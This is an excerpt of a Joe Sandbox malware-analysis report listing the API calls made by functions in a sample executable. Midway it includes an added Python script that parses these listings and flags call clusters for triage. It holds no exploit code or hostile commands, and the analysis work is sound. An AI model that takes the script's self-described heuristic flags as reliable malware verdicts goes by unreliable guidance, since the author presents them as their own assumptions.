• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• VirtualProtect.KERNELBASE(7009505C,00000004,00000040,7009504C), ref: 700929B1
Memory Dump Source
• Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
• Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
• SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
Memory Dump Source
• Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• GetDlgItem.USER32(?,00000403), ref: 004055ED
• GetDlgItem.USER32(?,000003EE), ref: 004055FC
• GetClientRect.USER32(?,?), ref: 00405639
• GetSystemMetrics.USER32(00000002), ref: 00405640
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
• ShowWindow.USER32(?,00000008), ref: 004056DC
• GetDlgItem.USER32(?,000003EC), ref: 004056FD
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
• GetDlgItem.USER32(?,000003F8), ref: 0040560B
  • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2
• GetDlgItem.USER32(?,000003EC), ref: 0040574F
• CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
• CloseHandle.KERNEL32(00000000), ref: 00405764
• ShowWindow.USER32(00000000), ref: 00405788
• ShowWindow.USER32(?,00000008), ref: 0040578D
• ShowWindow.USER32(00000008), ref: 004057D7
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
• CreatePopupMenu.USER32 ref: 0040581C
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
• GetWindowRect.USER32(?,?), ref: 00405850
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
• OpenClipboard.USER32(00000000), ref: 004058B1
• EmptyClipboard.USER32 ref: 004058B7
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
• GlobalLock.KERNEL32(00000000), ref: 004058CD
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
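The listing above is the routine that walks a list-view control (LVM_GETITEMCOUNT, then LVM_GETITEMTEXTW per row), copies the text into a GlobalAlloc'd buffer and hands it to SetClipboardData with format 0x0000000D, which is CF_UNICODETEXT. Reading hundreds of these per-function call lists by eye is slow, so the following Python script, added here as an example and not part of the Joe Sandbox report or its tooling, parses lines in exactly this "• Api.MODULE(args), ref: address" shape, resolves the SendMessageW message IDs that occur in the listings on this page to their names (values from winuser.h, commctrl.h and richedit.h), and flags a few call clusters a triager would want to see first. The sample input is a subset of the listing above; the flag heuristics are the author's own choices, not anything the report defines.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and flag call clusters.

Added example; not code from the Joe Sandbox report or its plugin.
"""
import re

# One listing line, e.g.:
#   • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
#   • EmptyClipboard.USER32 ref: 004058B7
#   • Part of subcall function 00404394: SendMessageW.USER32(...), ref: 004043A2
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Message IDs seen in the SendMessageW calls on this page (Windows SDK values).
MSG_NAMES = {
    0x0010: "WM_CLOSE", 0x0111: "WM_COMMAND",
    0x0401: "PBM_SETRANGE", 0x0409: "PBM_SETBARCOLOR", 0x2001: "CCM_SETBKCOLOR",
    0x1004: "LVM_GETITEMCOUNT", 0x1073: "LVM_GETITEMTEXTW",
    0x0435: "EM_EXLIMITTEXT", 0x0443: "EM_SETBKGNDCOLOR", 0x0445: "EM_SETEVENTMASK",
    0x0449: "EM_STREAMIN", 0x044B: "EM_GETTEXTRANGE", 0x045B: "EM_AUTOURLDETECT",
}
CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}

# Constructed sample: lines copied from the clipboard-export listing above.
SAMPLE = """\
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
• CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
• OpenClipboard.USER32(00000000), ref: 004058B1
• EmptyClipboard.USER32 ref: 004058B7
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
• SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
• CloseClipboard.USER32 ref: 00405912
"""


def parse_api_lines(text):
    """Return one dict per recognised listing line; unrecognised lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("mod"), "args": args,
                      "ref": int(m.group("ref"), 16), "subcall": m.group("sub")})
    return calls


def _hex_arg(args, index):
    """Argument as int, or None when the report shows '?' or a non-numeric value."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def decode_send_message(call):
    """Name of the message (2nd argument) for a SendMessageW call, else None."""
    if call["api"] != "SendMessageW":
        return None
    msg = _hex_arg(call["args"], 1)
    return None if msg is None else MSG_NAMES.get(msg, f"0x{msg:X}")


def summarize(calls):
    """Aggregate one function's calls; flags are triage heuristics (author's assumptions)."""
    apis = {c["api"] for c in calls}
    flags = []
    if {"OpenClipboard", "SetClipboardData"} <= apis:
        fmts = {_hex_arg(c["args"], 0) for c in calls if c["api"] == "SetClipboardData"}
        names = sorted(CLIPBOARD_FORMATS.get(f, f"format {f}") for f in fmts if f is not None)
        flags.append("clipboard write: " + ", ".join(names))
    if "GetClipboardData" in apis:
        flags.append("clipboard read")
    if "CreateThread" in apis:
        flags.append("thread creation")
    if "CoCreateInstance" in apis:
        flags.append("COM object instantiation")
    if "FindFirstFileW" in apis:
        flags.append("file enumeration")
    messages = [n for n in (decode_send_message(c) for c in calls) if n]
    return {"apis": sorted(apis), "flags": flags, "messages": messages}


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE)).items():
        print(f"{key}: {value}")
```

Run against a whole exported report, the summary separates routines that only shuffle dialog controls from the ones worth opening in the disassembler; the list-view plus CF_UNICODETEXT cluster above is ordinary installer UI behaviour, while a GetClipboardData hit or a CreateThread pointing at an unnamed function is where a triager should spend time.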
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,76F93420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A$Call
                                                                                                            • API String ID: 2624150263-413618503
                                                                                                            • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                            • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                            • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: Call$N
                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\rXKfKM0T49.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmp
